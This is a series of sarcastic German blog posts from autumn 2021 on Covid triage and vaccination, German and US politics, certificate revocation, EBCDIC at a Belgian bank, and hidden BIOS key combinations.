Wir haben in Deutschland bisher (!!!) keine ernstzunehmende Triage. Wir puffern die Differenz zwischen Patienten und Betten mit Überlastung des Pflegesersonals, welches wirklich above and beyond geht, damit wir keine Triage bekommen. Aber wir erreichen langsam unsere Pufferkapazitäten.
Eine weiche Triage existiert allerdings. Das ist die ärztliche Entscheidung, wann ein Patient intensivmedizinisch betreut wird und wann eine Eskalation der Therapie nicht mehr medizinisch sinnvoll ist. Das an dieser Stelle zum Wohle des Patienten zu wahrende Augenmaß ist sicherlich auch von der zum Zeitpunkt vorherrschenden Situation gefärbt.
Das ärztliche Personal ist natürlich auch maßlos überarbeitet, aber wir Klinikärzte sind traditionell Masochisten. Sonst würden wir einen anderen Job machen.
Ich finde nicht, dass wir uns hier in Begriffsstreitigkeiten über das Wort Triage verlieren sollten. Wenn du jemanden aufnimmst, obwohl du das Personal nicht hast, dann leidet für alle das Niveau. Das ist auch eine Form von Triage, finde ich.
[l] Neulich kam die Frage auf, ob wir Triage in den Krankenhäusern haben.
Da mailte mir echt jemand, er glaube das nicht. Weil er noch nicht in der Morgenpost gelesen hat, dass Triage gemacht wird.
Nun, ich schlage vor, ihr guckt euch mal die Grafik hier an, oder die hier für Intensivstationen.
Könnt ihr euch ja selber überlegen, was ihr daraus schließt.
Ich bin ja ehrlich gesagt fasziniert, dass sich die Frage überhaupt stellt für einige von euch. Wenn die öffentlich angesagt haben, dass sie Operationen verschoben haben... das ist doch Triage! Oder wie würdet ihr das nennen?
Klar will ich das als Krankenhauschef nicht über mein Haus in der Presse stehen haben, daher werde ich das nicht öffentlich ansagen. Bei uns kriegt jeder die bestmögliche Behandlung. Und wir haben auch freie Betten!! Gut, kein Personal für die Betten, aber Betten haben wir!1!!
Leute, ihr müsst doch merken, wenn ihr euch die Welt zurechtlügt, damit ihr besser schlafen könnt! Habt ihr das nicht als Anforderung an euch selbst, das zu merken? Weia.
Update: Zur Triage-Situation gibt es hier ab Minute 22 vom RKI-Chef ein paar Ausführungen. Sein Vortrag geht bei ca 15 Minuten los.
Und etwas, das Sie auch nicht vergessen dürfen, ist dass tatsächlich die Covid-Patienten länger auf den Intensivstationen liegen und dadurch die Kapazitäten natürlich noch enger werden. Was bei der Diskussion immer wieder vergessen wird: Wenn heute jemand einen Verkehrsunfall hat, dann braucht der auch ein Intensivbett. Und es ist in jeder Region Deutschlands bereits — in jeder, jetzt wo wir hier sprechen — ist die normale Versorgung nicht mehr so gesichert, wie wir das kennen. Es werden jetzt schon Schlaganfallpatienten teilweise über anderthalb, zwei Stunden gesucht, wo man sie hinfahren kann, weil die Betten nicht mehr frei sind. Herzinfarktpatienten. Es werden OPs verschoben.
Dann macht er weiter mit einer Grafik, wie das Personal an Krankenhäusern abnimmt. Ja, abnimmt. Bei Minute 25 ist die Folie zu sehen.

Mon Nov 15 2021

[l] Von Griechenland lernen heißt siegen lernen. Da gab es natürlich auch massiv Korruption bezüglich der Covid-Impfung.
Die Leute haben den Ärzten 400€ zugesteckt, um bloß Kochsalzlösung gespritzt zu kriegen. Aber sie wollten natürlich einen gültigen Impfpass.
Was haben die Ärzte gemacht? Haben Kochsalzlösung mit Impfstoff gespritzt!

Wed Nov 10 2021

[l] Die New York Times hat ein tolles Video gemacht, über die Democrats. Die heulen ja immer rum, dass die Republikaner im Weg stehen, wenn sie ihre progressiven Ziele umsetzen wollen.
Das Video hat jetzt mal geguckt, wie das in Bundesländern läuft, wo die Democrats durchregieren können, ohne dass auch nur ein einzelner Republikaner im Weg steht.
Und siehe da: Es sind nicht die Republikaner, die der gerechteren Verteilung im Weg stehen. Es sind die Democrats.
Die Erkenntnisse kann man glaube ich auch prima auf die SPD übertragen.
[l] Was muss die Linke tun, um politisch eine Rolle zu spielen? Hier hat mal jemand Umfragen gemacht, um das rauszufinden.
Die Ergebnisse könnten die Bevölkerung verunsichern!
Working-class voters prefer progressive candidates who focus primarily on bread-and-butter economic issues, and who frame those issues in universal terms. This is especially true outside deep-blue parts of the country. Candidates who prioritized bread-and-butter issues (jobs, health care, the economy), and presented them in plainspoken, universalist rhetoric, performed significantly better than those who had other priorities or used other language. This general pattern was even more dramatic in rural and small-town areas, where Democrats have struggled in recent years.
Is nich wahr! Drohende Obdachlosigkeit ist den Leuten wichtiger als Gendersternchen? Abwendung der Altersarmut ist dem Wähler wichtiger als paritätische Listenbesetzung? Na sowas!
Populist, class-based progressive campaign messaging appeals to working-class voters at least as well as mainstream Democratic messaging. Candidates who named elites as a major cause of America’s problems, invoked anger at the status quo, and celebrated the working class were well received among working-class voters — even when tested against more moderate strains of Democratic rhetoric.
Ja gut, das konnte man ja auch hier gut beobachten, bei Sahra Wagenknecht.
Progressives do not need to surrender questions of social justice to win working-class voters, but certain identity-focused rhetoric is a liability. Potentially Democratic working-class voters did not shy away from progressive candidates or candidates who strongly opposed racism. But candidates who framed that opposition in highly specialized, identity-focused language fared significantly worse than candidates who embraced either populist or mainstream language.
Ach. Ach watt. Leute, die die Miete kaum zusammengekratzt kriegen, haben keinen Bock, sich auch noch wegen "institutionalisiertem Rassismus" anpöbeln zu lassen? Wer hätte das gedacht!
Working-class voters prefer working-class candidates. A candidate’s race or gender is not a liability among potentially Democratic working-class voters. However, a candidate’s upper-class background is a major liability. Class background matters.
Na das ist ja mal massiv unerwartet! Die Unterdrückten haben keinen Bock, sich im Parlament von Unterdrückern vertreten zu lassen? Na sowas!!1! (Danke, Thomas)

Tue Nov 9 2021

[l] Aus der beliebten Reihe "Ein Glück, dass das ein Waffenenthusiast war und kein Islamist", heute: Mann hortete Waffen und 1.200 Kilogramm Munition. Diesmal in Niederösterreich. Die Beschreibung der Szene klingt wie die wunderschöne Hot-Fuzz-Szene :-)
Aber der Typ scheint doch mehr als bloß ein Enthusiast zu sein:
Ermittlungen des Landesamts für Verfassungsschutz und Terrorismusbekämpfung Niederösterreich (LVT) gegen den 53-Jährigen wurden u.a. wegen des Verdachts der nationalsozialistischen Wiederbetätigung geführt. Der Beschuldigte soll zahlreiche Dateien mit NS-Bezug in Internetforen versendet haben.
Das wäre bei uns in Deutschland ja undenkbar.
Absolut unmöglich.
Die Behörden ermitteln gegen Rechtsterroristen? Hahahaha, wo kämen wir da hin?!
Die Kapazitäten sind von den Linksterroristen komplett belegt.
Update: Ich sage euch, während die Behörden damit abgelenkt sind, rechtschaffenen Waffenenthusiasten ihre Bürgerrechte zu beschneiden, wird das Land von den Kommunisten übernommen!!1! Hätten sie mal mehr gegen den Linksterror gemacht!1!! (Danke, Axel)
[l] Anonymous hat sich mal den Hoster von Attila Hildmann zur Brust genommen. Ich linke jetzt darauf nicht wegen Hildmann sondern wegen der Zustände, die sie bei dem Hoster gefunden haben.
Das ist so grotesk, dass mir nur noch Referenzen wie "The Front Fell Off" einfallen oder Star-Trek-Referenzen wie "Verlust der strukturellen Integrität". Wie die Anons da bei Prosite herumstocherten, und langsam das Ausmaß der Katastrophe verstehen, das erinnerte mich an den Picard-Smiley aus Timescapes. Die haben da schnell noch einen Smiley auf die Homepage von dem Hildmann gemalt und dann haben sie sich aus dem Explosionsradius rausbewegt.

Mon Nov 8 2021

[l] Leserbrief zu Ivermectin:
Eigentlich ist das Rätsel um die gelegentliche Wirkung von Ivermectin längst geklärt.
Es gibt halt Leute mit Würmern. Deren Immunsystem hält die mühsam in Schach, und wenn man dann zur Verhinderung des Cytokinsturms bei einer Covid-19-Infektion Corticosteroide gibt, dann kommen die Würmer aus ihren Löchern gekrochen und vermehren sich.
Gibt man dann noch ein Entwurmmittel dazu (also Ivermectin), dann sterben die Würmer, und der Patient überlebt. Es geht hier also nur um eine Superinfektion.
Der Verdacht ist derzeit, dass die ganzen Ivermectin-Studien extra dort gemacht werden, wo viele Leute Würmer haben, und dann vielleicht sogar nur die mit Würmern in ihre Studie aufnehmen, weil es dann natürlich besser aussieht.

Fri Nov 5 2021

[l] Was passiert, wenn im Sanitärbereich der Kapitalismus ausbricht?
Ein paar Jahre gar nichts, dann wird der Harnstoff knapp.
Aber keine Sorge. Der Scheuer-Andi hat das Problem zur Chefsache gemacht und fordert jetzt einen runden Tisch.

Wed Nov 3 2021

[l] Hier kommen gerade einige verwunderte Fragen rein, wieso Zertifikate eigentlich überhaupt auslaufen.
Unterschriften unter Verträgen laufen ja auch nicht aus.
Einen wirklich guten Grund gibt es nicht, also im Sinne von "das wäre anders nicht lösbar gewesen". Zertifikate laufen im Wesentlichen aus, weil wir keinen guten Revocation-Mechanismus haben. Es gibt verschiedene Szenarien, in denen ein Zertifikat ungültig gemacht werden muss. Beispielsweise: Dem Eigentümer wird der Laptop geklaut, wo der Schlüssel dazu drauf war. Oder die damals verwendeten Krypto-Verfahren gelten heute als unsicher. Oder der Eigentümer hat die Passphrase vergessen und ein neues Zertifikat gemacht.
Was man dann eigentlich tun wollen würde, ist: Neues Zertifikat machen, altes Zertifikat als ungültig markieren. Nur: Wie? Wir reden hier von digitalen Daten! Wenn ich den Schlüssel verloren habe, kann ich ja auch gar nicht mehr nachweisen, dass das jemals mein Zertifikat gewesen ist! Jeglicher Nachweis davon basiert ja darauf, dass ich auf Zuruf Dinge tun kann, die man nur mit dem Schlüssel zum Zertifikat machen kann. Wenn ich den verloren habe, kann ich aber nichts davon machen!
PGP sah dafür vor, dass man beim Erstellen des Zertifikats auch gleich ein "dieses Zertifikat ist ungültig" erstellt, mit dem Schlüssel zum Zertifikat, und das tut man dann auf eine Diskette oder was damals so üblich war, oder druckt es aus, und packt es in einen feuerfesten Tresor irgendwo. Wenn man dann das Zertifikat zurückrufen muss, öffnet man den Tresor, holt den Rückruf raus, und verbreitet ihn.
Das ist jetzt aber alles nur bedingt praxistauglich. Daher hat man folgendes Rückrufverfahren ausprobiert: Die herausgebende Stelle (die CA) hat eine Liste an zurückgerufenen Zertifikaten. Wenn du zu einer Webseite gehst, dann holt dein Browser bei der CA die Liste und guckt, ob das vom Webserver präsentierte Zertifikat da als zurückgerufen draufsteht. Das Verfahren hat in der Praxis nie wirklich überzeugen können. Entweder die Liste wird lang und unhandlich, oder die CA hat plötzlich ein fettes Lastproblem, weil alle Browser der Welt da periodisch diese Liste abrufen wollen.
Das nächste Verfahren, das man probiert hat, war ein Webdienst, bei dem der Browser fragen kann: Ist dieses Zertifikat gültig? Das ist natürlich auch Mist, weil dann die CA sehen kann, wer auf meinen Webserver geht.
Und so bleibt nur die alte Methode mit dem Auslaufen der Zertifikate. Die sorgt dann auch dafür, dass die anderen Verfahren besser werden, weil man in der Datenbank der zurückgerufenen Zertifikate nur die nicht eh schon wegen Ablaufens ungültigen Zertifikate vorhalten muss.
In der Praxis war das aber alles ganz schlecht, so dass im Moment der Konsens ist, dass das mit Revocation alles nicht praxisfest ist, und man daher lieber kurze Lebenszeiten vergibt. Dann kann man die Zertifikate zwar nicht zurückrufen aber sie bleiben auch nicht mehr monatelang gültig.
Man könnte also sagen, dass wir auslaufende Zertifikatslebensdauern haben, weil wir keinen besseren Weg gefunden haben, wie man den Rückruf von Zertifikaten handhaben soll.
Und man könnte noch weitergehen und sagen, dass wir den besseren Weg auch nicht finden werden, weil die mittlerweise nur noch ein paar Monate langen Laufzeiten den Leidensdruck zu stark gesenkt haben.

Thu Oct 28 2021

[l] Hey, Fefe, ich hab gehört, Attribuierung von Cyberangriffen geht doch! Hier haben sie das mal gemacht! Ich zitiere:
Der Name, den K. in sozialen Netzwerken benutzt, lasse sich googeln und führe zu einer E-Mail-Adresse, mit der mehrere Websites registriert wurden. Mit diesen wiederum seien verschiedene russische Handynummern verknüpft, von denen eine zu einem Telegram-Account führt, auf dem eine Bitcoin-Adresse veröffentlicht wurde. Bitcoins im Wert von mehr als 400.000 Euro wurden darauf eingezahlt.
Whoa!
Ein Slam-Dunk-Fall, um mal den CIA-Direktor Tenet über die Beweislage zum Irakkrieg zu zitieren!
Aber wartet, geht noch weiter. Wir haben nicht nur Handwaving. Wir haben auch Appeal to Authority!
Experten eines Unternehmens, das sich auf Blockchain-Analysen spezialisiert hat, schreiben diese Einzahlungen mit hoher Wahrscheinlichkeit Erpressungen zu.
Ja also wenn das SO ist! Ungenannte Experten eines ungenannten Unternehmens sagen das! Na also DANN ist das ja wohl klar wie Kloßbrühe!!
Das, meine Damen und Herren, ist der Stand der Attribuierung von Cyberangriffen. Kaffeesatzlesen. Wir haben mal was gegoogelt.
Cyberattribuierung ist und bleibt eine Fata Morgana. (Danke, Simon)

Wed Oct 27 2021

[l] Pfizer hat eine Studie zur Verträglichkeit ihres Covid-Impfstoffes für 5-11-jährige Kinder gemacht.
Ergebnis: Es gab 5 Fälle mit schweren Vorfällen. Ich zitiere mal:
There were 5 severe adverse events. None were linked to the vaccine:
- Ingestion of a penny (1 person in the vaccine group)
- Fractures (2 people in the vaccine group and 1 in the placebo)
- Infective arthritis (one person in vaccine group)
Von den gebildeten Antikörpern her wirkt die Impfung vergleichbar wie bei Erwachsenen, auch gegen Delta.
Ja, äh, worauf warten wir also?
Update: War ja klar. Jetzt kommen hier die üblichen verdächtigen Ausreden. Und alle schieben sie die Arbeit zu mir rüber, anstatt selber mal geguckt zu haben.
Interessanterweise kam die eine Sache, die ich extra eingebaut hatte, nicht: Das war keine Studie von Pfizer sondern das war ein unabhängiger Clinical Trial, bei dem die zuständige Behörde die Rohdaten auswertet und nicht einfach "sieht alles jut aus" von Pfizer schluckt oder sich irgendwelche massierten Selektivdaten unterjubeln lässt. In die Falle ist aber niemand gelaufen, mir das vorzuwerfen.
Dafür kam "aber Kinder kriegen doch eh selten Covid". Das ist die erste fucking Sektion hinter dem Link. "Need". Noch bevor sie das Ergebnis sagen, haben sie die Need-Sektion. Da steht:
5-11 year olds represented 10.6% of cases in the week of Oct 10 (they make up 8.7% of the population
Only 42% of kids aged 5-11 years have antibodies from natural immunity.
There’ve been >8300 COVID19 hospitalizations of 5-11 year olds. Over 30% of 5-11 year olds hospitalized did not have an underlying condition.
Hilfreich fand ich auch diese Einordnung:
There have been 94 5-11 year olds that have died from COVID19. For context, this places COVID19 as the 8th leading cause of death for this age group. More recently (during Delta), COVID19 jumped to the 6th leading cause of death in this age group.
Die sterben nämlich auch sonst eher selten, Kinder in dieser Altersgruppe. Was wir nicht alles tun, damit das so bleibt! Geländer an Treppen und gefährlichen Kreuzungen und Brücken, Schulung aller Autofahrer, Helfer für Ampelüberquerung, Fahrradhelme und -reflektoren, ... und jetzt halt auch: Impfung.

Tue Oct 26 2021

[l] Stellt euch mal folgende Situation vor: Jemand hat einen Namen mit Umlaut und will damit in Belgien ein Bankkonto eröffnen. Die Bank kann keine Umlaute.
Das alleine ist ja schon ein Brüller, aber wartet, geht noch weiter.
Die Datenschutzgrundverordnung räumt in Artikel 16 der betroffenen Person das Recht ein, unverzüglich eine Berichtigung unrichtiger personenbezogener Daten zu verlangen.
Dieser Bankkunde ist also vor Gericht gezogen und hat seine Bank verklagt. Das Gericht gab ihm Recht.
Und jetzt die Punchline: Auf Seite 3 in dem obigen Dokument erklärt die Bank, wieso sie dem nicht nachkommen kann. Weil sie intern noch EBCDIC verwendet.
*Badumm tss*
Jetzt werde ich ein paar Jungsporne unter euch inhaltlich abgehängt haben, daher kurze Erklärung: Wenn du heute im Web etwas eingibst, oder eine Webseite anzeigen lässt, kommt die normalerweise als Unicode (üblicherweise im UTF-8 Encoding). Damit lassen sich einmal alle aktuell geschriebenen Sprachen abbilden und dann noch ein paar ausgestorbene.
Bevor wir Unicode hatten, hatten wir ISO-8859-1, das bildete die Sonderzeichen in Westeuropa ab. Dieser Standard zerbröselte aber bereits, wenn man mit Osteuropa kommunizieren wollte.
Bevor wir ISO-8859-1 hatten, hatten wir ASCII. Das ist ein amerikanischer Standard, der gar keine Umlaute kann. Und bevor sich ASCII durchsetzte, gab es noch EBCDIC, das ist ein lovecraftiger "cosmic horror" von einem Standard, der in den 1960er Jahren von IBM für deren Großrechner festgelegt wurde.
Die Bank da hat also vor Gericht einmal die Hosen runtergelassen und öffentlich erklärt, wie alt ihre Infrastruktur ist. Und sie ist ungefähr so alt, wie es sich nachts auf dem Friedhof an Halloween Horrorfans unter den Nerds gegenseitig zuraunen, was man gehört hat, was für versunkener Horror auf Bankgroßrechnern lauern. (via)
Update: Jetzt kommen hier lauter Leserbriefe zu EBCDIC rein. Oh Mann. Stellt sich raus: Es gibt Code Pages mit Umlauten für EBCDIC. Code Pages war auch das Konzept von ISO-8859-1. Da gab es dann auch ISO-8859-2 und so weiter. Da hätte man dann an jeden String ranschreiben müssen, welche Code Page das ist. Hat natürlich in der Praxis niemand gemacht und so konnte eine Software dann entweder global Umlaute oder Kyrillisch aber nicht beides. Der Ansatz ist gescheitert. Oh und dann gibt es auch sowas wie UTF-8 für EBCDIC, heißt UTF-EBCDIC (*göbel*). Ist halt in der Praxis alles Mist, denn Anwendungen, die noch EBCDIC einsetzen, haben dann auch feste Längen an ihren Feldern, was dann dazu führt, dass ein Umlaut mehrere Stellen im Feld belegt und dann nur kürzere Namen gehen oder so. Leute, die solche Systeme umstellen sollen, sitzen das daher häufig aus und hoffen, dass das mit dem Projekt Alles-Neu-In-Java besser wird.

Tue Oct 19 2021

[l] Die Berliner Wahlen sind übrigens noch nicht ausgestanden. Da gab es noch Luft nach unten.
[l] Völlig überraschend stellt sich raus, dass Cum-Ex bloß der Anfang war.
Unter Kennern des Falles ist bereits von "Cum-Ex zwei" die Rede. Bei Cum-Ex-Aktiendeals hatten Banken und Börsenhändler sich vom trickreich getäuschten Staat eine nur einmal gezahlte Steuer mehrmals erstatten lassen. Bei dem neuen Modell soll es ähnlich gelaufen sein.
Das klingt ja schon wie der Gipfel der Unmoral. Aber wartet mal, geht noch weiter!
Speziell für eine Steueroptimierung erzeugte Verluste aus dem Handel mit Zertifikaten sollen beim Fiskus doppelt geltend gemacht worden sein.
Zertifikate? Etwa … CO2-Emissionszertifikate? (Danke, Sebastian)

Sun Oct 17 2021

[l] Längerer Leserbrief zu Peak Magnesium:
dazu eine paar ziemlich mitleidslose Anmerkungen:
1. Da hätte man vielleicht nicht ausschließlich bei den Chinesen kaufen sollen. Und vielleicht hätte man darauf verzichten sollen, die anderen Lieferanten und sogar Partner mit den Füßen zu treten, als die Chinesen auf dem Markt drängten.
  Ich denke, wir kommen gar nicht umhin, unseren armen, von der Rohstoffknappheit bedrohten Unternehmen zu helfen. *Nachdem* die ihre Hausaufgaben gemacht und die Boni der Idioten, die damals die Entscheidungen getroffen haben, zurück geholt haben.
2. Die Chinesen verwenden für die Magnesium-Produktion den Pidgeon-Prozess, der bei der Produktion von 1KG Mg 31 KG Treibhausgase erzeugt. Ja. 31. Stahl: <=2.
  Aus Klimaschutzgründen ist eine Abkehr von diesem Prozess erforderlich.
  Im letzten Jahrhundert war der Dow-Prozess dominierend, ein Elektrolyseverfahren. Moderne Elektrolyseverfahren kommen mit <=25 KG Co2 hin, und das SOM/YSZ-Verfahren verspricht das noch weiter zu reduzieren (ganz auf 0 bringen wird man das nicht, Energie wird ja immer gebraucht).
3. 2012:
  168kt Rohstoffe und Fertigprodukte aus Mg importiert
  21kt recycled.
  40kt exportiert.
  137kt etwa verloren.
  Ist der Import unser Problem? Oder vielleicht doch die Müllberge?
  (Die international magnesium association kommt auf deutlich höhere Recyling-Zahlen von 63kt, wovon aber 51kt sogenannter "new scrap" sein sollen, also gleich von der Produktion ins Recyling wandern. Das wären aber über 25% der Gesamtmenge, und das will ich einfach nicht glauben, ganz abgesehen davon, dass es auch der üblichen Definition von Recyling widerspricht).
4. Wenn ich im von Dir verlinkten Text
  dass die jetzigen Magnesiumvorräte in Deutschland, bzw. in ganz Europa, spätestens in einigen Wochen Ende November 2021 erschöpft sein werden.
  [...]
  Magnesium steht seit 2017 auf der Liste der kritischen Rohstoffe der EU. Die Europäische Kommission hat dies in ihrer Mitteilung zur „Widerstandsfähigkeit der EU bei kritischen Rohstoffen: Einen Pfad hin zu größerer Sicherheit und Nachhaltigkeit abstecken“ im September 2020 nochmals bekräftigt. Politisch-strategische Überlegungen und Maßnahmen zur Sicherstellung des Lieferflusses blieben bislang jedoch aus.
  lese, fühle ich eine gewisse Aggressivität in mir aufsteigen.
  Sind das eventuell dieselben Unternehmen, die sonst bei jedem staatlichen Eingreifen laut aufschreien?
Ja komm, das ist ja wohl was völlig anderes!1!! Der Staat soll die Verluste übernehmen und uns beim Abschöpfen der Profite nicht im Wege stehen. Das überrascht hoffentlich niemanden mehr, dass das so läuft bei der Corruptionsunion.

Fri Oct 15 2021

[l] Bei meinem Gemecker über das Altmaiern der IT-Security in Deutschland könnte der Eindruck entstehen, dass das ein Alleinstellungsmerkmal Deutschlands ist. Ist es leider nicht. Hier ein aktueller Fall aus den USA. Da hat ein Journalist auf einer der Schulbehörde View Source gemacht und fand im HTML die SSNs von Lehrern.
The issue involved a web application that allowed the public to search teacher certifications and credentials. The newspaper said that no private information was clearly visible or searchable, but teachers' Social Security numbers were contained in the HTML source code of those pages. More than 100,000 Social Security numbers were vulnerable, it added.
Dazu muss man wissen, dass SSN und Name im Allgemeinen ausreichen, um in den USA einen Identitätsdiebstahl zu begehen. Das ist also kein triviales Problem hier, diese versiffte Behörde hat einmal alle ihre Lehrer ans Messer geliefert.
Die Zeitung hat sich also gedacht, wir sind gute Bürger, wir melden das mal und zögern unsere Berichterstattung hinaus, bis die das gefixt haben, und geguckt haben, ob es dasselbe Problem auch auf anderen Webseiten von ihnen gibt.
Hier ist die Reaktion des Gouverneurs:
The governor is characterizing the paper's actions as a hacking that the state will investigate. He said it could cost taxpayers $50 million.
"Not only are we going to hold this individual accountable, but we will also be holding accountable all those who aided this individual and the media corporation that employs them," Parson said at a news conference on Thursday.
Es geht um Missouri, und der Gouverneur ist natürlich CDU, äh, ich meine, ... Republikaner. (Danke, Lutz)

Thu Oct 14 2021

[l] Völlig überraschend stellt sich raus, dass Amazon genau das gemacht hat, wonach es aussah: Sie haben erfolgreiche Produkte billig abgekupfert und unter eigenem Label verkauft. Und damit die gut liefen, haben sie die in ihren Suchergebnisse nach oben sortiert.

Mon Oct 11 2021

[l] Ich hab hier gerade einen neuen Acer Swift 1 am Start, dank Lieferkettenchaos preislich deutlich weniger attraktiv als das letzte Mal, aber was willste machen.
Diese Acer-Geräte haben ein Touchpad, das standardmäßig im "Advanced Mode" läuft, das ist dann ein Protokoll, das HID (von USB) über I2C spricht. Hat sich Microsoft irgendwann aus dem Arsch gezogen. Dieser HID-über-I2C-Scheiß hat zwar einen Treiber unter Linux, aber irgendwas muss ich da falsch gemacht haben, jedenfalls erkannte der das Gerät nicht.
Früher konnte man im BIOS einfach das Touchpad von Advanced auf Basic schalten, was das auf ein PS2-Gerät mit Synaptics-Protokoll umstellte, was unter Windows und Linux auf Anhieb funktioniert.
In den aktuellen BIOSsen gibt es diesen Schalter nicht mehr. Das Handbuch erwähnt auch keinen Weg, wie man das umschalten kann.
Und dann ... fand ich einen Cheat Code fürs BIOS. Den raunt man sich in Acer-Foren zu.
Du musst im BIOS ins Main Tab gehen und Ctrl-S drücken. Dann erscheint ein Knopf für das Touchpad und ein Knopf für das AHCI-Umschalten.
Alter Schwede, dass wir mal 1990er-Gaming-Style Cheat Codes im BIOS haben würden, das hätte ich bis gestern nicht geglaubt.
Update: Leserbrief dazu:
bzgl. Cheatcodes fürs BIOS, das hat MSI mittlerweile auch "verbrochen". Da ist es sogar noch etwas abenteuerlicher, muß man doch die rechte SHIFT- und CTRL-, sowie die linke ALT-Taste gedrückt halten und dann noch zusätzlich F2 drücken und schon kommt man in das "advanced" BIOS rein. Da sind dann allerdings auch Sachen drin, mit denen man sich sein Notebook definitiv bricken kann. Ich hatte da mal versehentlich das interne Display abgeschaltet (klares Eigenverschulden, weil nicht richtig aufgepaßt). Das BIOS danach zurückzusetzen ist nicht so einfach bei fest verbauten Akkus und keinem BIOS-Reset Knopf.
Update: Noch ein Leserbrief:
Diese "Cheat Codes fürs BIOS" sind garnicht so jung, wie es sich in deinem Beitrag anhört. HP hat in Ihre BIOS und frühen EFI Implementationen (die Jahrgänge die noch wie das vorherige BIOS ausgesehen haben) ebenfalls solche Codes verstecken lassen. Wenn man CTRL-A auf dem Main Tab drückte, konnte man zusätzliche Eingabefelder im "System-IDs" Fenster anzeigen damit der Reparatur-Service nach einem SysBoard-Replacement die Seriennummer und Service Tags und so Scheiße wieder einstellen konnte.
[l] Wie schlimm ist die Lage? So schlimm: Deutsche Großkonzerne fordern eine "Umsetzungsoffensive für Klimaneutralität".
SO KRASS hat der Altmaier unsere Zukunft zerstört, dass die Großkonzerne Angst kriegen.
Ich finde, wir sollten dem Altmaier ein paar Denkmäler bauen. Früher gab es in Berlin eine ewige Flamme für die Wiedervereinigung, am Theodor-Heuss-Platz. Nach der Wiedervereinigung hat man daraus eine ewige Flamme für die Demokratie gemacht.
Wenn man schon sinnlos fossile Energieträger verbrennt, dann sollte man das als Erinnerung an Altmaier tun, nicht für Demokratie. Für die Demokratie wäre es besser, wenn wir weniger fossile Energieträger verbrennen würden, nicht mehr.

Fri Oct 8 2021

[l] Noch ein Leserbrief zum Pflegenotstand:
vielleicht um den Ernst der Lage sich mal vor Augen zu führen: Die sind nicht nur seit 4 Wochen am Streiken, Vivantis will die am langen Arm verhungern lassen. Die Streikkasse ist gut gefüllt aber Gewerkschaften zahlen nur einen Teil des Lohns als Streikgeld aus (bei Verdi sind es 80%). Jeder kann sich jetzt mal die letzte Lohnzahlung nehmen und 20% davon abziehen. Und sich dann überlegen was es bedeutet wenn die Streikenden zu Spenden aufrufen.
Faktisch ist es noch schlimmer, die Gehälter sind niedrig, werden aber durch Schichtzulagen erhöht. Jedenfalls für die, die Nacht-/Wochenendschichten machen können, auch eine Ungerechtigkeit aber anderes Thema. Verdi zahlt natürlich nur 80% vom Basisgehalt ohne Zulagen. In dem Zusammenhang darf man es bewerten, dass sie bei der Charite "nur" mit mehr Neueinstellungen zufrieden waren.
Vivantes hat übrigens alles versucht um den Streik zu verhindern. Nein, nicht durch Vorlage eines vernünftigen Angebots sondern indem sie der Notdienstvereinbarung nicht zustimmten und einen Besetzungsschlüssel forderten der dem normalen Dienstplan entspricht. Damit konnten sie noch eine einstweilige Verfügung erwirken, sind dann aber vor Gericht gescheitert. Danach drohten sie den Pflegenden die sich am Streik beteiligen mit Kündigung.
Demnächst gesellen sich drei Kliniken von Asklepios in Brandenburg zu den Bestreikten, da hat Verdi über 90% bei der Urabstimmung für einen unbefristeten Streik abgeholt.
Für die Notfälle in Berlin bedeutet das: Nach Brandenburg rausfahren is dann nicht mehr. Ich seh da ein großes Pulverfass was demnächst hochgehen wird, wenn wir als Öffentlichkeit weiter wegschauen und die Politik den Markt regeln lässt. Und die Lunte brennt...
Haha und wir haben uns über das verkackte System der Amis lustig gemacht!
[l] Das neueste Opfer der "Code of Conduct"-Marodeure: Die .NET-Foundation.
Die haben eines Tages von allen Projekten eingefordert, dass die auf ihren Github-Repositories der Foundation Admin-Zugang geben, explizit damit die Code of Conduct-Enforcement machen kann. Wenn man ihnen Adminzugang gegeben hat, haben sie damit das Projekt vom public github in ihren Enterprise Github umgezogen.
Money Quote:
From what I have seen, the .NET Foundation has not fostered anything for any of its members, and constantly undermines them.
Das ist ja leider das übliche Muster unter den Diversity- und Code-of-Conduct-Freiheitskämpfern. Die kommen vorbeigeflogen wie ein Heuschreckenschwarm, ekeln die Leute raus, die das jeweilige Projekt ehrenamtlich ins Leben gerufen und groß gemacht haben, hinterlassen einen Krater aus negativen Gefühlen und ziehen dann weiter zum nächsten Opfer. Dass von denen mal jemand produktiv Code eincheckt, der über "hier war ein Kommentar nicht richtig gegendert" oder "Das heißt jetzt nicht mehr black list sondern list of colour!1!!" hinausgeht, habe ich zumindest noch nie beobachtet.
Nun war .NET ja noch nie ein Community-Projekt, das war eher Astroturfing von Microsoft, um es so aussehen zu lassen, als hätten sie auch sowas wie eine Community. Ich habe noch nie verstanden, wie sich da jemand einbringen kann. Aber was weiß ich schon. Wenn es euch glücklich macht, einem Milliarden-Techkonzern zu helfen, für ihre PR eine Community herbeizulügen, dann viel Spaß!

Mon Oct 4 2021

[l] Ah, die Facebook-Nummer war auch noch einer für die Kategorie "Verschwörungen, die sich als wahr herausstellten". Da sind ein paar interne Papiere geleakt, in denen Facebook-Leute sich gegenseitig schreiben, dass sie die Welt kaputt machen.
Die Whistleblowerin hat sich inzwischen zu erkennen gegeben und bei der Regierung offiziell Whistblowerschutz beantragt.
Es gibt da zwei besonders bemerkenswerte Aspekte, finde ich.
Erstens: Die Frau hat einen MBA von Harvard. Wie krass muss das bei Facebook sein, dass jemand mit einem MBA von Harvard sagt: Sorry, Leute, das ist mir zu unethisch hier. Die sind doch weltweit verschrien als ethikfreie Selbstbereicherungsroboter!
Zweitens: Dieser Absatz hier:
A 2019 internal report seen by Haugen said major European political parties, "…feel strongly that the change to the algorithm has forced them to skew negative in their communications on Facebook… leading them into more extreme policy positions."
"You are forcing us to take positions that we don't like, that we know are bad for society," Haugen said, paraphrasing what the political parties told Facebook researchers in this report. "We know if we don't take those positions, we won't win in the marketplace of social media."
Da würde ich ja gerne mal die Dokumente sehen, bevor ich das glaube. Soviel Selbstreflektion traue ich politischen Parteien aus Europa nicht zu. Vor allem: Wann gab es denn bitte mal ein für die Gesellschaft negatives Verhaltensmuster, das die CDU nicht völlig ohne Vorbehalte gemacht hätte, und bei dem die SPD nicht "mit Bauchschmerzen" aufgesprungen ist?!
Würde mich wundern, wenn das in anderen Ländern auders aussieht.
Oder vielleicht ist diese Whistleblowerin auch nur echt bauernschlau und bietet den Parteien jetzt einen schönen Weg an, sich selbst aus der Verantwortung zu ziehen, wenn sie bloß auf Facebook eindreschen, was ja eh politisch opportun ist.
[l] Defendant attempts citizen's arrest on judge during assault trial.
